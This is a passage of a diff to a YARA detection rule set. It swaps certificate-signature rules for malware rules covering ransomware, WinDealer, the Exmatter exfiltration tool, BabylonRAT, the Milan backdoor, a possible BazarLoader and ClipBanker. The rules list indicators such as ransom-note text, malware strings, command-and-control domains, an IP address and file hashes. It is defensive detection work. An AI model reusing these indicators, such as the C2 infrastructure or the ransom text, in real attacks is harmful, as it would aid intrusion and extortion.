-		id = "ad027dc9-14bc-50dd-b260-7672c528ef9a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c6e4ce00-0be9-572d-987c-c47d699002f0"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2952-L2963"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8248-L8268"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4697ce0a7fcd1fa6ac1dd5246f2a23b85865bef4010280c4ca2e12c433b8ceb2"
+		logic_hash = "5d79a4f310fb00022eb9d636f161227e84a7e15517c4d2c39acafa7d81af5c2a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "01e201cce1024237978baccf5b124261aa5edb01"
-		importance = 20
+
+	strings:
+		$s1 = "main.EncWorker" fullword ascii
+		$s2 = "Paths2Encrypt" fullword ascii
+		$s3 = "/cmd/encryptor/main.go" ascii
+		$s4 = "*win.FileUtils; .autotmp_41 *lib.Encryptor; .autotmp_" ascii
+		$s5 = "\"Microsoft Window" fullword wide
+		$s6 = "Legal_Policy_Statement" fullword wide
+		$s7 = ").Encrypt." ascii
+		$s8 = "*struct { F uintptr; pw *os.File; c *" ascii
+		$s9 = ".ListFilesToEnc." ascii
+		$m1 = "WINNER WINNER CHICKEN DINNER" ascii
+		$m2 = "All your servers and computers are encrypted" ascii
+		$m3 = "We guarantee to decrypt one image file for free." ascii
+		$m4 = "We WILL NOT be able to RESTORE them." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eebbffbceacddbfaeefaecdbaf" and pe.signatures [ i ] . serial == "00:f0:03:14:91:b6:73:ec:df:53:3d:4e:be:4b:54:69:7f" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 3 of ( $m* ) or ( 1 of ( $m* ) and 2 of ( $s* ) ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Becd4Ef55Ced54E5Bcde595D872Ae7Eb : FILE
+rule DITEKSHEN_MALWARE_Win_Windealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects WinDealer"
 		author = "ditekSHen"
-		id = "85835042-a4ab-5cb2-963d-4ef776b740d1"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d4f3b0cc-121e-5032-9721-1e2a86842fa5"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2965-L2976"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8270-L8301"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b573853cfb28bdbda37c929834faa15475707684edfe99f14174599faf7b4fb6"
+		logic_hash = "eabc41ea69f142ee7c243cbc75ceda909a722be382ad91a01c805aef637be915"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "72ae9b9a32b4c16b5a94e2b4587bc51a91b27052"
-		importance = 20
+		snort_sid = "920264"
+
+	strings:
+		$d1 = "downfile" fullword ascii
+		$d2 = "getmypath" fullword ascii
+		$d3 = "content-type: monitor" fullword ascii
+		$d4 = "content-type: UsedType" fullword ascii
+		$d5 = "write command error" fullword ascii
+		$d6 = "C:\\WINDOWS\\system32\\kernel32.dll" fullword ascii
+		$l1 = "currentconfig" fullword ascii
+		$l2 = "remotedomain" fullword ascii
+		$l3 = "reserveip" fullword ascii
+		$l4 = "otherinfo" fullword ascii
+		$l5 = "filelen" fullword ascii
+		$l6 = "%s%s.bak" fullword wide
+		$l7 = "localmachine" fullword ascii
+		$l8 = "remoteip" fullword ascii
+		$l9 = "datastate" fullword ascii
+		$l10 = "SYSTEM\\CurrentControlSet\\Control\\Network\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\%s\\Connection" fullword ascii
+		$s1 = "%s\\%s\\V5_History.dat" fullword wide
+		$s2 = "%s\\%s\\history2.dat" fullword wide
+		$s3 = "%s\\%s\\history.imw" fullword wide
+		$s4 = "%s\\%s\\main.imw" fullword wide
+		$s5 = "%s%d.%d.%d.%dWindows/%u" fullword ascii
+		$s6 = "%s\\%c_%s_tmp" fullword wide
+		$s7 = "%s\\%s\\main.db" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dedbfdefcac" and pe.signatures [ i ] . serial == "be:cd:4e:f5:5c:ed:54:e5:bc:de:59:5d:87:2a:e7:eb" )
+		uint16( 0 ) == 0x5a4d and ( ( 4 of ( $d* ) and 1 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $d* ) ) or 6 of ( $l* ) or ( pe.exports ( "DealC" ) and pe.exports ( "DealR" ) and pe.exports ( "DealS" ) and 1 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_55B5E1Cf84A89C4E023399784B42A268 : FILE
+rule DITEKSHEN_MALWARE_Win_Exmatter : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BlackMatter data exfiltration tool"
 		author = "ditekSHen"
-		id = "de2890d4-3758-5e90-a9af-dc519f0b9e4c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "93df7a68-1e19-5db3-95d4-39d77d1036d8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2978-L2989"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8303-L8325"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "37f08db5373cf46da7c0a4a03af21559fdcddb2481f935d5cece55a1fb4abc3c"
+		logic_hash = "25a35c82919f96bdba00558616f574e901b83785713ed1a63a6f06df576777cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "940345ed6266b67a768296ad49e51bbaa6ee8e97"
-		importance = 20
+		hash1 = "4a0e10e1e9fea0906379f99fa350b91c2af37f0fd2cc55491643cc71a9887d30"
+		hash2 = "a5e050f1278473d41c3a3d6f98f3fd82932f51a937bc57d8f5605815f0efb0f8"
+
+	strings:
+		$s1 = "Renci.SshNet." ascii
+		$s2 = "DirNotEmpty" fullword ascii
+		$s3 = "MkDir" fullword ascii
+		$s4 = "RmDir" fullword ascii
+		$s5 = "get_MainWindowHandle" fullword ascii
+		$s6 = "GetCurrentProcess" fullword ascii
+		$s7 = "]]>]]>" fullword wide
+		$s8 = "1.3.132.0.35" fullword wide
+		$s9 = "1.3.132.0.34" fullword wide
+		$s10 = "1.2.840.10045.3.1.7" fullword wide
+		$x1 = "sender2.pdb" fullword ascii
+		$x2 = { 64 00 61 00 74 00 61 00 ?? 72 00 6f 00 6f 00 74 }
+		$x3 = "157.230.28.192" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fbbdefaccbbcdc" and pe.signatures [ i ] . serial == "55:b5:e1:cf:84:a8:9c:4e:02:33:99:78:4b:42:a2:68" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $x* ) and 7 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_84C3A47B739F1835D35B755D1E6741B5 : FILE
+rule DITEKSHEN_MALWARE_Win_Brbbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BrbBot"
 		author = "ditekSHen"
-		id = "00fba5a5-b87d-54f7-a5b8-f7b377af2202"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d77dfdcf-4cd5-578e-99eb-c987e7b5b706"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2991-L3002"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8327-L8345"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6beb0966f2ed981c2e1a859ff9f659a566de867888123c387eeb89a97620345e"
+		logic_hash = "64df5bba698fbba1baf27eedb9a2eb46c5e0752996ea91900f8377200d54eeeb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8057f20f9f385858416ec3c0bd77394eff595b69"
-		importance = 20
+		snort_sid = "920265"
+
+	strings:
+		$x1 = "brbconfig.tmp" fullword ascii
+		$x2 = "brbbot" fullword ascii
+		$s1 = "%s?i=%s&c=%s&p=%s" fullword ascii
+		$s2 = "exec" fullword ascii
+		$s3 = "CONFIG" fullword ascii wide
+		$s4 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" fullword ascii
+		$s5 = { 43 4f 4e 46 49 47 00 00 65 6e 63 6f 64 65 00 00
+                73 6c 65 65 70 00 00 00 65 78 69 74 00 00 00 00
+                63 6f 6e 66 00 00 00 00 66 69 6c 65 00 00 00 00
+                65 78 65 63 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bddbdcfabededdeadbefed" and pe.signatures [ i ] . serial == "84:c3:a4:7b:73:9f:18:35:d3:5b:75:5d:1e:67:41:b5" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_28F6Ca1F249Cfb6Bdb16Bc57Aaf0Bd79 : FILE
+rule DITEKSHEN_MALWARE_Win_Babylonrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BabylonRAT / CollectorStealer / ParadoxRAT"
 		author = "ditekSHen"
-		id = "b0568efe-d0cc-528d-a9b4-fdb8106c3d0f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7352e0cf-64ab-5ba4-afaf-04067a0046e8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3004-L3015"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8347-L8373"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c27ad7caa87b366593b82ff5e2b38bda5383e178e2cc01121aaaa5e90beaec86"
+		logic_hash = "352efb98e298e9f0ce17c20d44d193f2565ec559923210d80dec1a0988545a30"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "0811c227816282094d5212d3c9116593f70077ab"
-		importance = 20
+
+	strings:
+		$x1 = "Babylon RAT Client" wide nocase
+		$x2 = "ParadoxRAT_Client" fullword ascii
+		$s1 = "@ConfigsEx" fullword wide
+		$s2 = "ClipBoard.txt" fullword wide
+		$s3 = "[%02d/%02d/%d %02d:%02d:%02d] [%s] (%s):" fullword wide
+		$s4 = "\\%Y %m %d - %I %M %p" fullword wide
+		$s5 = "[%02d/%02d/%d %02d:%02d:%02d] (%s)" fullword wide
+		$s6 = " c:\\Windows\\system32\\cmd.exe" fullword wide
+		$s7 = "Update Failed [OpenProcess]" wide
+		$s8 = "DoS Already Active..." fullword wide
+		$s9 = "File Downloaded and Execut" wide
+		$s10 = "LgDError33x98dGetProcAddress" fullword wide
+		$s11 = "@SPYNET" fullword wide
+		$s12 = "Recovery.Recovery" fullword wide
+		$s13 = "GetChrome" fullword wide
+		$s14 = "\\drivers\\etc\\HOSTS" fullword ascii
+		$s15 = "plugin-container.exe" fullword ascii
+		$s16 = "bss_server.usrRelay" fullword ascii
+		$s17 = "sckRelay" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdcafaabbdcaaaeaaee" and pe.signatures [ i ] . serial == "28:f6:ca:1f:24:9c:fb:6b:db:16:bc:57:aa:f0:bd:79" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 8 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2C3E87B9D430C2F0B14Fc1152E961F1A : FILE
+rule DITEKSHEN_MALWARE_Win_Netsupport : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects NetSupport client"
 		author = "ditekSHen"
-		id = "8e686e58-8fc5-50cf-9259-dcd70f5cc27b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "958e82c5-aeac-58f4-b214-a9382b598cd9"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3017-L3028"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8375-L8386"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "43a8f2d9055091f930af456abd334e38fb6a98bee3bfb8dcbf84c9563c777101"
+		logic_hash = "4e8120d902fdee2a3f87c85bb6bb7d3bba79e3828500f297c2dc57d5213cf6a8"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "80daa4ad14fc420d7708f2855e6fab085ca71980"
-		importance = 20
+		snort_sid = "920266-920267"
+
+	strings:
+		$s1 = ":\\nsmsrc\\nsm\\" fullword ascii
+		$s2 = "name=\"NetSupport Client Configurator\"" fullword ascii
+		$s3 = "<description>NetSupport Manager Remote Control.</description>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abfaacccde" and pe.signatures [ i ] . serial == "2c:3e:87:b9:d4:30:c2:f0:b1:4f:c1:15:2e:96:1f:1a" )
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4808C88Ea243Eefa47610D5F5F0D02A2 : FILE
+rule DITEKSHEN_MALWARE_Win_Gobrutloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects GoBrut StealthWorker laoder"
 		author = "ditekSHen"
-		id = "ea3aadc6-3edd-5e4b-adfe-824103531deb"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "748f8055-71d9-5757-8eb0-90dc3ee35c74"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3030-L3041"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8388-L8394"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9fa722bfed0c31e263772615799bbdc054da1424b139c7d73e5755334fb86346"
+		logic_hash = "6241117cffb147763ace41b36cd1524f48bfc7cb06d56a82d7b30bec9e1baf5b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5dc400de1133be3ff17ff09f8a1fd224b3615e5a"
-		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bfcdcdfcdfcaaeff" and pe.signatures [ i ] . serial == "48:08:c8:8e:a2:43:ee:fa:47:61:0d:5f:5f:0d:02:a2" )
+		uint16( 0 ) == 0x5a4d and pe.exports ( "@SetFirstEverVice@8" )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2F184A6F054Dc9F7C74A63714B14Ce33 : FILE
+rule DITEKSHEN_MALWARE_Win_Milan : FILE
 {
 	meta:
-		description = "Detects executables signed AprelTech Silent Install Builder certificate"
+		description = "Detects Milan Lyceum backdoor"
 		author = "ditekSHen"
-		id = "17797e5c-acf2-5c4e-b3e0-c48fb7bff996"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "2ea0775b-65d4-58b9-9af9-c07f29742627"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3043-L3054"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8396-L8467"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d14428b81b4ae4a77a517d2148f4b67b45963b71d998139b42ed4e4352fae6a5"
+		logic_hash = "102af43be7cc3d873fbce78c95c767ebb6aadb2e7084b48f3cf48c11071d7a71"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "ec9c6a537f6d7a0e63a4eb6aeb0df9d5b466cc58"
-		importance = 20
+		hash1 = "21ab4357262993a042c28c1cdb52b2dab7195a6c30fa8be723631604dd330b29"
+		hash2 = "a2754d7995426b58317e437f8ed6770cd7bb7b18d971e23b2b300b75e34fa086"
+		hash3 = "b46949feeda8726c0fb86d3cd32d3f3f53f6d2e6e3fcd6f893a76b8b2632b249"
+		hash4 = "b54a67062bdcd32dfa9f3d7b69780d2e6e4925777290bc34e8f979a1b4b72ea2"
+		hash5 = "b766522dd4189fef7775d663e5649ba9d8be8e03022039d20848fcbc3643e5f2"
+		hash6 = "d3606e2e36db0a0cb1b8168423188ee66332cae24fe59d63f93f5f53ab7c3029"
+		hash7 = "857e2f63a1078d49adc59a03482f7b362563f16fb251f174bdaa7759ed47922a"
+		hash8 = "4f1b8c9209fa2684aa3777353222ad1c7716910dbb615d96ffc7882eb81dd248"
+
+	strings:
+		$ua1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" fullword wide
+		$ua2 = "Mozilla/5.0 (Android; Mobile; rv:28.0) Gecko/28.0 Firefox/28.0" fullword wide
+		$ua3 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 520)" fullword wide
+		$ua4 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7)" fullword wide
+		$ua5 = "Mozilla/5.0 (IE 11.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko" fullword wide
+		$ua6 = "Mozilla/5.0 (iPad; U; CPU OS 5_1_1 like Mac OS X; en-us) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3" fullword wide
+		$ua7 = "Mozilla/5.0 (Linux; Android 4.1; Galaxy Nexus Build/JRN84D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19" fullword wide
+		$ua8 = "Mozilla/5.0 (Linux; Android 7.1.1; ASUS_X017DA Build/NGI77B; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/1.5.1(11790) Chrome/74.0.3729.157 Mobile Safari/537.36" fullword wide
+		$ua9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0" fullword wide
+		$ua10 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" fullword wide
+		$ua11 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36" fullword wide
+		$ua12 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" fullword wide
+		$n1 = "charset={[A-Za-z0-9\\-_]+}" fullword wide
+		$n2 = "Content-Length: {[0-9]+}" fullword wide
+		$n3 = "Location: {[0-9]+}" fullword wide
+		$n4 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
+		$n5 = "{<html>}" fullword wide
+		$n6 = "&formid=" fullword ascii
+		$n7 = "/?id=" fullword ascii
+		$p1 = "\\milan\\Debug\\Milan.pdb" ascii
+		$p2 = "\\milan\\Release\\Milan.pdb" ascii
+		$p3 = "\\BackDor Last\\" ascii
+		$p4 = "\\BackDorLast\\" ascii
+		$s1 = "/q \"%s\" & waitfor" wide
+		$s2 = "/q \"%s\" & schtasks /delete" wide
+		$s3 = "*BOT@;" fullword ascii
+		$s4 = "mofcomp \"" fullword ascii
+		$s5 = "\"WQL\";};instance of " ascii
+		$s6 = "</svalue>" fullword wide
+		$s7 = "cmd.exe /C " wide nocase
+		$d1 = "akastatus.com" ascii
+		$d2 = "centosupdatecdn.com" ascii
+		$d3 = "checkinternet.org" ascii
+		$d4 = "cybersecnet.co.za" ascii
+		$d5 = "cybersecnet.org" ascii
+		$d6 = "defenderlive.com" ascii
+		$d7 = "defenderstatus.com" ascii
+		$d8 = "digitalmarketingagency.net" ascii
+		$d9 = "dnsanalizer.com" ascii
+		$d10 = "dnscatalog.net" ascii
+		$d11 = "dnscdn.org" ascii
+		$d12 = "dnsstatus.org" ascii
+		$d13 = "excsrvcdn.com" ascii
+		$d14 = "hpesystem.com" ascii
+		$d15 = "livednscdn.com" ascii
+		$d16 = "micrsoftonline.net" ascii
+		$d17 = "ndianmombais.com" ascii
+		$d18 = "online-analytic.com" ascii
+		$d19 = "securednsservice.net" ascii
+		$d20 = "sysadminnews.info" ascii
+		$d21 = "uctpostgraduate.com" ascii
+		$d22 = "updatecdn.net" ascii
+		$d23 = "web-traffic.info" ascii
+		$d24 = "windowsupdatecdn.com" ascii
+		$d25 = "wsuslink.com" ascii
+		$d26 = "zonestatistic.com" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APREL Tehnologija d.o.o." and pe.signatures [ i ] . serial == "2f:18:4a:6f:05:4d:c9:f7:c7:4a:63:71:4b:14:ce:33" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $p* ) and ( 2 of ( $s* ) or 2 of ( $ua* ) ) ) or ( 5 of ( $n* ) and ( 2 of ( $ua* ) or 1 of ( $p* ) or 1 of ( $s* ) ) ) or ( 3 of ( $s* ) and ( 2 of ( $ua* ) or 5 of ( $n* ) ) ) or ( 2 of ( $d* ) and 6 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ced72Cc75Aa0Ebce09Dc0283076Ce9B1 : FILE
+rule DITEKSHEN_MALWARE_Win_UNK05 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects potential BazarLoader"
 		author = "ditekSHen"
-		id = "7482c8a9-22d7-5ecf-951c-83818e2aeda7"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "12f66315-f381-5910-b1d4-2cbf21c889a4"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3056-L3067"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8469-L8486"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "47fceb2a79271011bc6feed209ef4021db155dbc0fd4891f0dc1e900f2cb7fdb"
+		logic_hash = "b3074f237fbaf449a53dcc219f48509db6af4c0d0859e6590563c3412be30aa8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "db77b48a7f16fecd49029b65f122fa0782b4318f"
-		importance = 20
+
+	strings:
+		$s1 = "/api/get" ascii wide
+		$s2 = "PARENTCMDLINE" fullword ascii
+		$s3 = "https://microsoft.com/telemetry/update.exe" ascii wide
+		$s4 = "api.opennicproject.org" fullword ascii wide
+		$s5 = "https://%hu.%hu.%hu.%hu:%u" fullword ascii wide
+		$s6 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31" ascii wide
+		$s7 = "PARENTJOBID" fullword ascii wide
+		$s8 = "\\System32\\rundll32.exe" fullword ascii wide
+		$s9 = "{ccc38b40-5b04-4fb1-a684-07c7e448d4df}" fullword ascii wide
+		$s10 = "{065f6686-990b-46fc-829c-a53ec188a723}" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Valerie LLC" and pe.signatures [ i ] . serial == "00:ce:d7:2c:c7:5a:a0:eb:ce:09:dc:02:83:07:6c:e9:b1" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C4564802095258281A284809930Dcf43 : FILE
+rule DITEKSHEN_MALWARE_Win_Clipbanker01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ClipBanker infostealer"
 		author = "ditekSHen"
-		id = "f70f481c-f5cf-5767-9fb0-0adecd0dc1f3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b56514f4-8362-5698-8142-be836b70a11a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3069-L3080"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8488-L8521"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "547613d507b04e3bd944515c77cb6ec161fe008b8e2b43cda574a46cbe2ef5ef"
+		logic_hash = "8ef90e22299a1009468761a4cdb8e2a92920d721f1a7ebceeb81a07e14f9156f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "73db2555f20b171ce9502eb6507add9fa53a5bf3"
-		importance = 20
+
+	strings:
+		$s1 = "Clipper" fullword wide
+		$s2 = "Ushell" fullword wide
+		$s3 = "Banker" fullword wide
+		$s4 = "ClipPurse" fullword wide nocase
+		$s5 = "SelfClip" fullword wide
+		$s6 = "Cliper" fullword wide
+		$s7 = "FHQD4313-33DE-489D-9721-6AFF69841DEA" fullword wide
+		$s8 = "Remove.bat" fullword wide
+		$s9 = "\\w{1}\\d{12}" fullword wide
+		$s10 = "SELECT * FROM Win32_ComputerSystem" fullword wide
+		$s11 = "red hat" fullword wide
+		$s12 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00
+                 2e 00 65 00 78 00 65 00 00 ?? 2f 00 63 00 72 00
+                 65 00 61 00 74 00 65 00 20 00 2f 00 73 00 63 00
+                 20 00 00 ?? 20 00 2f 00 6d 00 6f 00 20 00 00 ??
+                 20 00 2f 00 72 00 6c 00 20 00 00 ?? 20 00 2f 00
+                 74 00 6e 00 20 00 00 ?? 20 00 2f 00 74 00 72 00
+                 20 00 00 ?? 20 00 ?? 00 ?? 00 00 ?? 2f 00 64 00
+                 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 74 00
+                 6e }
+		$s13 = "ClipChanger" fullword ascii
+		$s14 = "CheckVirtual" fullword ascii
+		$s15 = "InjReg" fullword ascii
+		$s16 = "SuicideFile" fullword ascii
+		$s17 = "HideFile" fullword ascii
+		$s18 = "AntiVm" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cfeaaeedaefddfaaccefcdbae" and pe.signatures [ i ] . serial == "c4:56:48:02:09:52:58:28:1a:28:48:09:93:0d:cf:43" )
